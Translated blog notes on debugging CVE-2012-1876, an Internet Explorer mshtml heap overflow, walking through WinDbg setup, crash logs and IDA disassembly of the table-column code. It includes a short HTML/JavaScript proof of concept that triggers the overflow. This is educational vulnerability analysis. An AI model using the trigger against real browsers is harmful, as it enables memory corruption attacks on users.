[Original] Vulnerability Wars: CVE-2012-1876 Debugging Notes
2018-3-18 03:22

Preface

I took some notes while debugging CVE-2012-1876 from the book 漏洞战争 (Vulnerability Wars). The vulnerability analysis itself is already explained clearly in the book and in VUPEN's write-up.
Since this was my first time using WinDbg, I mainly recorded my environment setup (for example how to load symbol files) and a very detailed debugging log, in the hope that it helps people who, like me, are just starting to learn vulnerability analysis and debugging.

References

Setting up the debugging environment

Download

WinDbg symbol file setup

Enter the following in the WinDbg command window:

.sympath SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols

It has to be entered again after a restart.

PoC debugging

<html>
 <body>
 <table style="table-layout:fixed" >
        <col id="132" width="41" span="1" >&nbsp </col>
 </table>
 <script>

 function over_trigger() {
        var obj_col = document.getElementById("132");
        obj_col.width = "42765";
        obj_col.span = 1000;
 }

 setTimeout("over_trigger();",1);

 </script>
 </body>
 </html>

HPA-based vulnerability analysis

  • hpa: enables page heap, which places a dedicated guard page right after each heap block to detect overflows; a heap overflow that touches the guard page raises an exception immediately.

Enable hpa with gflags from a terminal.

After launching IE, attach WinDbg to the process.


There are two processes: the broker process and the content process for the page. Attach to the latter, the content process.
Check whether hpa is enabled.

0:000> .symfix
0:000> .reload
Reloading current modules
................................................................
.............................
0:000> !gflag
Current NtGlobalFlag contents: 0x02000000
    hpa - Place heap allocations at ends of pages

Child-process debugging must then be enabled, otherwise the debugger will not break.

.childdbg 1

Then g to let the debuggee run.

0:027> g
ModLoad: 74c30000 74c38000   C:\Windows\system32\credssp.dll
ModLoad: 752a0000 752a8000   C:\Windows\system32\secur32.dll
ModLoad: 750c0000 750f8000   C:\Windows\system32\ncrypt.dll
ModLoad: 750a0000 750b7000   C:\Windows\system32\bcrypt.dll
ModLoad: 74c70000 74cad000   C:\Windows\system32\bcryptprimitives.dll
ModLoad: 74b50000 74b66000   C:\Windows\system32\GPAPI.dll
ModLoad: 70c60000 70c7c000   C:\Windows\system32\cryptnet.dll
ModLoad: 72e70000 72e85000   C:\Windows\system32\Cabinet.dll
ModLoad: 74d10000 74d1e000   C:\Windows\system32\DEVRTL.dll


The debugger is now running.
Next drag the PoC into the browser.
Once the PoC is dropped in, the debugger breaks automatically.

After another g it looks like this.

1:021> g
ModLoad: 760f0000 7610f000   C:\Windows\system32\IMM32.DLL
ModLoad: 75b40000 75c0c000   C:\Windows\system32\MSCTF.dll
ModLoad: 6ccf0000 6d76c000   C:\Windows\system32\IEFRAME.dll
ModLoad: 75da0000 75da5000   C:\Windows\system32\PSAPI.DLL
ModLoad: 72940000 7297c000   C:\Windows\system32\OLEACC.dll
ModLoad: 741a0000 7433e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\comctl32.dll
ModLoad: 75810000 7588b000   C:\Windows\system32\comdlg32.dll
ModLoad: 71620000 71655000   C:\Program Files\Internet Explorer\IEShims.dll
ModLoad: 75460000 7546c000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 74390000 743d0000   C:\Windows\system32\uxtheme.dll
ModLoad: 75500000 7550e000   C:\Windows\system32\RpcRtRemote.dll
ModLoad: 735b0000 735c3000   C:\Windows\system32\dwmapi.dll
ModLoad: 723c0000 723f3000   C:\Program Files\Internet Explorer\sqmapi.dll
ModLoad: 74f90000 74fa6000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 76170000 7630d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 756b0000 756d7000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 756e0000 756f2000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 74d30000 74d6b000   C:\Windows\system32\rsaenh.dll
ModLoad: 764a0000 76523000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 743f0000 744e5000   C:\Windows\system32\propsys.dll
ModLoad: 6f9e0000 6fa0b000   C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 772c0000 773b4000   C:\Windows\system32\WININET.dll
ModLoad: 76490000 76493000   C:\Windows\system32\Normaliz.dll
ModLoad: 75510000 7551b000   C:\Windows\system32\profapi.dll
ModLoad: 753f0000 7540a000   C:\Windows\system32\SspiCli.dll
ModLoad: 75db0000 75de5000   C:\Windows\system32\ws2_32.DLL
ModLoad: 759f0000 759f6000   C:\Windows\system32\NSI.dll
ModLoad: 74e10000 74e54000   C:\Windows\system32\dnsapi.DLL
ModLoad: 739a0000 739bc000   C:\Windows\system32\iphlpapi.DLL
ModLoad: 73980000 73987000   C:\Windows\system32\WINNSI.DLL
ModLoad: 6d920000 6d94e000   C:\Windows\system32\MLANG.dll
ModLoad: 75410000 7545b000   C:\Windows\system32\apphelp.dll
ModLoad: 73fe0000 74001000   C:\Windows\system32\ntmarta.dll
ModLoad: 77500000 77545000   C:\Windows\system32\WLDAP32.dll
ModLoad: 74a10000 74a19000   C:\Windows\system32\VERSION.dll
ModLoad: 67b10000 680c2000   C:\Windows\System32\mshtml.dll
ModLoad: 6e2c0000 6e2ea000   C:\Windows\System32\msls31.dll
ModLoad: 75470000 754cf000   C:\Windows\system32\SXS.DLL
ModLoad: 71270000 712a2000   C:\Windows\system32\WINMM.dll
ModLoad: 744f0000 74529000   C:\Windows\system32\MMDevAPI.DLL
ModLoad: 6daf0000 6db20000   C:\Windows\system32\wdmaud.drv
ModLoad: 6dae0000 6dae4000   C:\Windows\system32\ksuser.dll
ModLoad: 74730000 74737000   C:\Windows\system32\AVRT.dll
ModLoad: 6db20000 6db56000   C:\Windows\system32\AUDIOSES.DLL
ModLoad: 74760000 7476b000   C:\Windows\system32\msimtf.dll
ModLoad: 6dad0000 6dad8000   C:\Windows\system32\msacm32.drv
ModLoad: 6dab0000 6dac4000   C:\Windows\system32\MSACM32.dll
ModLoad: 6daa0000 6daa7000   C:\Windows\system32\midimap.dll


Then allow the ActiveX control to run.

(4b8.c00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=00414114 ecx=04141149 edx=00004141 esi=06caf000 edi=06caf018
eip=67f3f167 esp=0452daa8 ebp=0452dab4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CTableColCalc::AdjustForCol+0x15:
67f3f167 890f            mov     dword ptr [edi],ecx  ds:0023:06caf018=????????

Then use kb to walk back up the stack.

1:025> kb
ChildEBP RetAddr  Args to Child              
0452dab4 67db5b8e 00414114 0452ddf8 00000001 mshtml!CTableColCalc::AdjustForCol+0x15
0452db64 67c20713 00000001 0452ddf8 000003e8 mshtml!CTableLayout::CalculateMinMax+0x52f
0452dd80 67c0af19 0452ddf8 0452ddc4 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0452df2c 67cfcc48 0452f5a0 0452e158 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0452e064 67cef5d0 06e19ea8 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
0452e128 67cef31d 06e19ea8 0001769c 0001769c mshtml!CFlowLayout::MeasureSite+0x312
0452e170 67cef664 0779bf00 00000061 0452f5a0 mshtml!CFlowLayout::GetSiteWidth+0x156
0452e1b0 67cefb40 07bfafb0 06e19ea8 00000001 mshtml!CLSMeasurer::GetSiteWidth+0xce
0452e234 6e2c665d 07862ff8 0452e254 0452e318 mshtml!CEmbeddedILSObj::Fmt+0x150
0452e2c4 6e2c6399 07c12efc 00000000 07025d20 msls31!ProcessOneRun+0x3e9
0452e320 6e2c6252 07c12f18 00018258 00000000 msls31!FetchAppendEscCore+0x18e
0452e374 6e2c61c3 00000000 00000000 00000014 msls31!LsDestroyLine+0x47f
0452e3fc 6e2c293f 00000007 00003832 00000000 msls31!LsDestroyLine+0x9ff
0452e438 67cedd81 00000001 00000007 00003832 msls31!LsCreateLine+0xcb
0452e588 67d017cc 0452f5a0 00000007 07bfafc0 mshtml!CLSMeasurer::LSDoCreateLine+0x127
0452e62c 67d01ef5 0452ee90 0001769c 00000000 mshtml!CLSMeasurer::LSMeasure+0x34
0452e674 67d01db1 00000000 00017e6c 00000083 mshtml!CLSMeasurer::Measure+0x1e6
0452e698 67d011a2 00017e6c 00000083 0779bf40 mshtml!CLSMeasurer::MeasureLine+0x1c
0452e748 67d2a8f6 0452ec68 07470fd8 00000083 mshtml!CRecalcLinePtr::MeasureLine+0x46d
0452ef50 67d2b304 0452f5a0 00000007 0000000e mshtml!CDisplay::RecalcLines+0x8bb
0452f0a0 67d28c5c 0452f5a0 00000007 0000000e mshtml!CDisplay::UpdateView+0x208
0452f154 67d29ee3 0452f5a0 0452f6d8 0873cf10 mshtml!CFlowLayout::CommitChanges+0x9c
0452f264 67c0eb06 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcTextSize+0x30f
0452f4ec 67d002ee 0779bf00 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeCoreCompat+0x1045
0452f508 67d00367 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeCore+0x49
0452f544 67d0029c 0452f5a0 0452f6d8 00000000 mshtml!CBodyLayout::CalcSizeCore+0xd8
0452f57c 67cfcc48 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeVirtual+0x1af
0452f6b4 67c84121 0779bf00 00000001 00000000 mshtml!CLayout::CalcSize+0x2b8
0452f7a4 67d290f9 00100000 00000007 059ebeb4 mshtml!CFlowLayout::DoLayout+0x543
0452f7e0 67cec8ca 059eb870 00100000 0452f840 mshtml!CView::ExecuteLayoutTasks+0x3b
0452f824 67d2336d 00000000 0452f870 0000008d mshtml!CView::EnsureView+0x355
0452f848 67ce94b2 059eb870 00000000 06d24d58 mshtml!CView::EnsureViewCallback+0xd3
0452f87c 67cd37f7 0452f918 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0452f89c 75ce86ef 000f0402 00000012 00000000 mshtml!GlobalWndProc+0x10c
0452f8c8 75ce8876 67cc1de3 000f0402 00008002 USER32!InternalCallWinProc+0x23
0452f940 75ce89b5 00000000 67cc1de3 000f0402 USER32!UserCallWinProcCheckWow+0x14b
0452f9a0 75ce8e9c 67cc1de3 00000000 0452fa28 USER32!DispatchMessageWorker+0x35e
0452f9b0 6cde04a6 0452f9c8 00000000 00752f58 USER32!DispatchMessageW+0xf
0452fa28 6cdf0446 05688808 00000000 006ccff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452
0452fae0 75f549bd 00752f58 00000000 0452fafc IEFRAME!LCIETab_ThreadProc+0x2c1
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 
0452faf0 76361174 006ccff0 0452fb3c 7741b3f5 iertutil!CIsoScope::RegisterThread+0xab
WARNING: Stack unwind information not available. Following frames may be wrong.
0452fafc 7741b3f5 006ccff0 73d26994 00000000 kernel32!BaseThreadInitThunk+0x12
0452fb3c 7741b3c8 75f549af 006ccff0 00000000 ntdll!__RtlUserThreadStart+0x70
0452fb54 00000000 75f549af 006ccff0 00000000 ntdll!_RtlUserThreadStart+0x1b

Symbols may be missing here; the fix is as follows.
Enter the following in the WinDbg command window:

.sympath SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols

After that the symbols resolve.

Analysis
First, the crash site (the analysis is in the comments of the listing below).

1:025> uf mshtml!CTableColCalc::AdjustForCol
mshtml!CTableColCalc::AdjustForCol:
67f3f152 8bff            mov     edi,edi
67f3f154 55              push    ebp
67f3f155 8bec            mov     ebp,esp
67f3f157 8b08            mov     ecx,dword ptr [eax]
67f3f159 53              push    ebx
67f3f15a 8b5d08          mov     ebx,dword ptr [ebp+8]
67f3f15d 57              push    edi
67f3f15e 8bc1            mov     eax,ecx
67f3f160 83e00f          and     eax,0Fh
67f3f163 8d7e18          lea     edi,[esi+18h]       ; edi is derived from esi, but esi is set up outside this function, so we trace further up the call chain.
67f3f166 50              push    eax
67f3f167 890f            mov     dword ptr [edi],ecx ; writing the value to the memory edi points at causes the crash
67f3f169 e89eacdbff      call    mshtml!CUnitValue::IsScalerUnit (67cf9e0c)
67f3f16e 85c0            test    eax,eax
67f3f170 7411            je      mshtml!CTableColCalc::AdjustForCol+0x31 (67f3f183)

...

Now it is clear: we need to break in the calling function.
Restart WinDbg and attach again.

0:021> .childdbg 1
Processes created by the current process will be debugged
0:021> lmm mshtml
start    end        module name
0:021> sxe ld:mshtml
0:021> g

At this point drag the PoC in (note that there is no prompt to allow ActiveX).

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*
Symbol search path is: srv*
Executable search path is: srv*
Page heap: pid 0xDC4: page heap enabled with flags 0x3.
(dc4.e34): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0016f5d8 edx=774064f4 esi=fffffffe edi=00000000
eip=7745e60e esp=0016f5f4 ebp=0016f620 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
7745e60e cc              int     3
1:014> g
ModLoad: 691c0000 69772000   C:\Windows\System32\mshtml.dll
eax=07237000 ebx=00000000 ecx=00171000 edx=00000000 esi=7ffda000 edi=0467b384
eip=774064f4 esp=0467b29c ebp=0467b2f0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
774064f4 c3              ret

1:025> lm m mshtml
start    end        module name
691c0000 69772000   mshtml     (deferred)
  • lm (List Loaded Modules)
    The lm command displays the specified loaded modules. The output includes the module status and path.

    • m Pattern
      Specifies a pattern that the module name must match. Pattern can contain a variety of wildcard characters and specifiers. For more information about the syntax, see String Wildcard Syntax.
  • The sx command displays the list of exceptions and non-exception events for the current process, and shows how the debugger behaves when it encounters each exception or event.

    • sxe Break
      When this exception occurs, the target breaks into the debugger immediately, before any error handler is activated. This kind of handling is called first-chance handling.
  • ld (Load Symbols)
    The ld command loads symbols for the specified module and refreshes all module information.

Put together: ld names mshtml as the module to load, and sxe forces a break once that module has been loaded.
Now we can set a breakpoint on the function.

1:025> bp mshtml!CTableLayout::CalculateMinMax
1:025> bl
 0 e 692d018a     0001 (0001)  1:**** mshtml!CTableLayout::CalculateMinMax
1:025> g
(c84.798): Unknown exception - code 80010108 (first chance)
(c84.8e8): Unknown exception - code 80010108 (first chance)
Breakpoint 0 hit
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff            mov     edi,edi
  • bp, bu, bm (Set Breakpoint)
    The bp, bu and bm commands set one or more software breakpoints. Location, condition and options can be combined to set many different kinds of software breakpoint.
  • bl (Breakpoint List)
    The bl command lists information about existing breakpoints.
  • The g command starts execution of the given process or thread. Execution stops when the program ends, when BreakAddress is reached, or when another event causes the debugger to stop.

I used IDA as an aid while debugging, although it is not really necessary.
Find CalculateMinMax directly by static analysis.

Symbols need to be loaded here too.

Keep single-stepping; p steps over (it does not enter calls), although just pressing Enter repeats the last command too.

eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff            mov     edi,edi
1:025> 
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018c esp=0467e4b0 ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x2:
692d018c 55              push    ebp
1:025> 
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018d esp=0467e4ac ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x3:
692d018d 8bec            mov     ebp,esp
1:025> 
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018f esp=0467e4ac ebp=0467e4ac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x5:
692d018f 81ec90000000    sub     esp,90h
1:025> 
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0195 esp=0467e41c ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xb:
692d0195 53              push    ebx
1:025> 
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0196 esp=0467e418 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xc:
692d0196 8b5d08          mov     ebx,dword ptr [ebp+8] ss:0023:0467e4b4=0492aea8

Note mov ebx,dword ptr [ebp+8] ss:0023:0467e4b4=0492aea8: [ebp+8] is the first argument (you know how the stack frame works...).

1:025> dd poi(ebp+8)
0492aea8->poi(ebp+8)  691c9868 06216f30 071d8fb8 69384918
0492aeb8  00000001 00000000 0108080d ffffffff
0492aec8  00000000 00000000 00000000 ffffffff
0492aed8  0001769c 0000a7f8 00000000 00000000
0492aee8  00000000 00412802 00000000 00000000
0492aef8  00000000 00000001 ffffffff ffffffff
0492af08  ffffffff ffffffff 691c9fd0 00000004
0492af18  00000004 0497eff0 691c9fd0 00000004
  • dd: double-word (4-byte) values
    The default number displayed is 32 DWORDs (128 bytes).
  • poi()
    Pointer-sized data at the specified address. The pointer size is either 32 or 64 bits. In kernel-mode debugging it depends on the processor of the target machine. In user-mode debugging on an Intel Itanium machine it is either 32 or 64 bits depending on the target application. So if you want pointer-sized data, it is best to use the poi operator.
1:025> ln 691c9868 
(691c9868)   mshtml!CTableLayout::`vftable'   |  (691c99a8)   mshtml!CTableLayoutBlock::`vftable'
Exact matches:
    mshtml!CTableLayout::`vftable' = <no type information>
  • The ln command displays the symbol at, or nearest to, the given address.

So the first argument refers to the CTableLayout object, i.e. the object behind the <table> tag.

1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0199 esp=0467e418 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xf:
692d0199 56              push    esi
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d019a esp=0467e414 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x10:
692d019a 8b750c          mov     esi,dword ptr [ebp+0Ch] ss:0023:0467e4b8=0467e740
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d019d esp=0467e414 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x13:
692d019d 8b4628          mov     eax,dword ptr [esi+28h] ds:0023:0467e768=00000000
1:025> p
eax=00000000 ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d01a0 esp=0467e414 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x16:
692d01a0 898574ffffff    mov     dword ptr [ebp-8Ch],eax ss:0023:0467e420=00171000
1:025> p
eax=00000000 ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d01a6 esp=0467e414 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x1c:
692d01a6 8b4354          mov     eax,dword ptr [ebx+54h] ds:0023:0492aefc=00000001

ebx+54h here points to the span value of the col element inside the table; the PoC has a single span value of 1, so 1 is stored here.

Honestly, reading assembly this way in WinDbg is painful, so let's switch to IDA.

.text:74D3018A
.text:74D3018A                 mov     edi, edi
.text:74D3018C                 push    ebp
.text:74D3018D                 mov     ebp, esp
.text:74D3018F                 sub     esp, 90h
.text:74D30195                 push    ebx             ; struct tagSIZE *
.text:74D30196                 mov     ebx, [ebp+arg_0] ; -> argument 1 refers to the CTableLayout object, i.e. the in-memory object for the table tag.
.text:74D30199                 push    esi             ; struct CTableCalcInfo *
.text:74D3019A                 mov     esi, [ebp+arg_4]
.text:74D3019D                 mov     eax, [esi+28h]
.text:74D301A0                 mov     [ebp+var_8C], eax
.text:74D301A6                 mov     eax, [ebx+54h]  ; -> sum of the span attribute values; call it spansum
.text:74D301A9                 mov     [ebp+arg_0], eax ; -> arg_0 = spansum
.text:74D301AC                 mov     eax, [ebx+128h]
.text:74D301B2                 shr     eax, 2
...
...
...
.text:74D30293 loc_74D30293:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+105j
.text:74D30293                 mov     edx, [ebp+arg_0] ; -> edx = arg_0 = spansum
.text:74D30296                 mov     eax, edx
.text:74D30298                 sub     eax, ecx
.text:74D3029A                 mov     [ebp+var_1C], eax
.text:74D3029D                 push    0
.text:74D3029F                 pop     eax
.text:74D302A0                 setz    al
.text:74D302A3                 mov     [ebx+50h], ecx
.text:74D302A6                 shl     eax, 8
.text:74D302A9                 xor     eax, [ebx+44h]
.text:74D302AC                 and     eax, 100h
.text:74D302B1                 xor     [ebx+44h], eax
.text:74D302B4                 test    byte ptr [esi+2Ch], 1
.text:74D302B8                 jnz     loc_74C5EE4D
.text:74D302BE
.text:74D302BE loc_74D302BE:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)-D133Bj
.text:74D302BE                 xor     eax, eax
.text:74D302C0
.text:74D302C0 loc_74D302C0:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1957B9j
.text:74D302C0                 or      [ebp+var_38], eax
.text:74D302C3                 cmp     [ebp+arg_8], edi
.text:74D302C6                 jnz     loc_74EC5948
.text:74D302CC                 mov     eax, [ebx+94h]  ; -> CTableLayout+0x94, compared against spansum; call it spancmp
.text:74D302D2                 shr     eax, 2          ; -> spancmp>>2, i.e. spancmp/4
.text:74D302D5                 cmp     eax, edx        ; jump if spancmp>>2 >= spansum; here 0 < 1, so no jump.
.text:74D302D7                 jge     short loc_74D30312
.text:74D302D9                 cmp     edx, edi
.text:74D302DB                 lea     esi, [ebx+90h]
.text:74D302E1                 jl      loc_74C2CE82
.text:74D302E7                 cmp     edx, [esi+8]
.text:74D302EA                 jbe     short loc_74D302FF
.text:74D302EC                 push    1Ch             ; unsigned int
.text:74D302EE                 mov     eax, edx
.text:74D302F0                 mov     edi, esi
.text:74D302F2                 call    ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z ; CImplAry::EnsureSizeWorker(uint,long)

Stepping into CImplAry::EnsureSizeWorker, we find that it mainly allocates heap memory. The allocation size is spansum * 0x1C; although spansum is 1 here, the minimum allocation is 0x1C * 4 = 0x70. The address of the allocation is stored at CTableLayout+0x9C.

.text:74DF8F9C ; public: long __thiscall CDataAry<long>::EnsureSize(long)
.text:74DF8F9C ?EnsureSize@?$CDataAry@J@@QAEJJ@Z proc near
.text:74DF8F9C                                         ; CODE XREF: CTimerCtx::CTimerCtx(CTimerMan *,_RTL_CRITICAL_SECTION *)+ACp
.text:74DF8F9C                                         ; CDocument::EnumObjects(ulong,IEnumUnknown * *)+6Bp ...
.text:74DF8F9C
.text:74DF8F9C ; FUNCTION CHUNK AT .text:74DF9013 SIZE 00000009 BYTES
.text:74DF8F9C ; FUNCTION CHUNK AT .text:74EBD728 SIZE 00000007 BYTES
.text:74DF8F9C
.text:74DF8F9C                 mov     edi, edi
.text:74DF8F9E                 push    edi             ; __int32
.text:74DF8F9F                 mov     edi, ecx
.text:74DF8FA1                 test    eax, eax
.text:74DF8FA3                 jl      loc_74EBD728
.text:74DF8FA9                 cmp     eax, [edi+8]
.text:74DF8FAC                 ja      short loc_74DF9013
.text:74DF8FAE                 xor     eax, eax
.text:74DF8FB0                 pop     edi
.text:74DF8FB1                 retn
.text:74DF8FB1 ?EnsureSize@?$CDataAry@J@@QAEJJ@Z endp
.text:74DF8FB1
.text:74DF8FB1 ; ---------------------------------------------------------------------------
.text:74DF8FB2                 db 5 dup(90h)
.text:74DF8FB7
.text:74DF8FB7 ; =============== S U B R O U T I N E =======================================
.text:74DF8FB7
.text:74DF8FB7 ; Attributes: bp-based frame
.text:74DF8FB7
.text:74DF8FB7 ; __int32 __thiscall CImplAry::EnsureSizeWorker(CImplAry *__hidden this, unsigned int, __int32)
.text:74DF8FB7 ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z proc near
.text:74DF8FB7                                         ; CODE XREF: CSelectionRenderingServiceProvider::GetSelectionChunksForLayout(CFlowLayout *,CRenderInfo *,CDataAry<HighlightSegment> *,int *,int *)-6B92p
.text:74DF8FB7                                         ; CView::DeferTransition(COleSite *)+3Fp ...
.text:74DF8FB7
.text:74DF8FB7 dwBytes         = dword ptr -8
.text:74DF8FB7 var_4           = dword ptr -4
.text:74DF8FB7 Size            = dword ptr  8
.text:74DF8FB7
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74E02CB4 SIZE 00000036 BYTES
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74E3BEEC SIZE 0000003D BYTES
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74EBD6E7 SIZE 0000000D BYTES
.text:74DF8FB7
.text:74DF8FB7                 mov     edi, edi
.text:74DF8FB9                 push    ebp
.text:74DF8FBA                 mov     ebp, esp
.text:74DF8FBC                 push    ecx
.text:74DF8FBD                 push    ecx
.text:74DF8FBE                 push    ebx
.text:74DF8FBF                 push    esi             
.text:74DF8FC0                 mov     esi, eax
.text:74DF8FC2                 push    4
.text:74DF8FC4                 pop     eax
.text:74DF8FC5                 mov     [ebp+var_4], eax
.text:74DF8FC8                 cmp     esi, eax
.text:74DF8FCA                 jnb     loc_74E02CB4
.text:74DF8FD0
.text:74DF8FD0 loc_74DF8FD0:                           
.text:74DF8FD0                                         ; CImplAry::EnsureSizeWorker(uint,long)+9D25j ...
.text:74DF8FD0                 mov     eax, [ebp+var_4] ; -> eax = 4
.text:74DF8FD3                 mul     [ebp+Size]      ; -> allocates spansum*0x1C bytes, at least 0x1C*4 = 0x70
.text:74DF8FD6                 push    edx
.text:74DF8FD7                 push    eax             ; -> size argument
.text:74DF8FD8                 lea     eax, [ebp+dwBytes]
.text:74DF8FDB                 call    ?ULongLongToUInt@@YGJ_KPAI@Z ; ULongLongToUInt(unsigned __int64,uint *)
.text:74DF8FE0                 mov     ebx, eax
.text:74DF8FE2                 test    ebx, ebx
.text:74DF8FE4                 jnz     short loc_74DF900B
.text:74DF8FE6                 test    byte ptr [edi+4], 2
.text:74DF8FEA                 jnz     loc_74E3BEEC
.text:74DF8FF0                 push    [ebp+dwBytes] ;->spansum*0x1c=0x1c 
.text:74DF8FF3                 lea     esi, [edi+0Ch]
.text:74DF8FF6                 call    ?_HeapRealloc@@YGJPAPAXI@Z ; -> after CImplAry::EnsureSizeWorker completes, the returned buffer address is stored at CTableLayout+0x90+0xC; this is the heap block involved in the vulnerability, call it vulheap
.text:74DF8FFB                 mov     ebx, eax
.text:74DF8FFD                 test    ebx, ebx
.text:74DF8FFF                 jnz     short loc_74DF900B
.text:74DF9001

Let's look at the address of the allocated buffer, vulheap.

1:025> bp mshtml!CTableLayout::CalculateMinMax+0x168
1:025> g
Breakpoint 1 hit
eax=00000001 ebx=0492aea8 ecx=00000000 edx=00000001 esi=0492af38 edi=0492af38
eip=692d02f2 esp=0467e40c ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x1d3:
692d02f2 e8c08c0c00      call    mshtml!CImplAry::EnsureSizeWorker (69398fb7)

The allocated address is at ebx+0x9C.

1:025> p
eax=00000000 ebx=0492aea8 ecx=7741349f edx=00000000 esi=0492af38 edi=0492af38
eip=692d02f7 esp=0467e410 ebp=0467e4ac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x1df:
692d02f7 85c0            test    eax,eax
1:025> dd ebx+9c
0492af44  07e20f90 00000000 00000000 00000000
0492af54  00000000 00000000 00000000 00000000
0492af64  00000000 000000c8 000000c8 00000000
0492af74  00000000 00000000 00000000 00000000
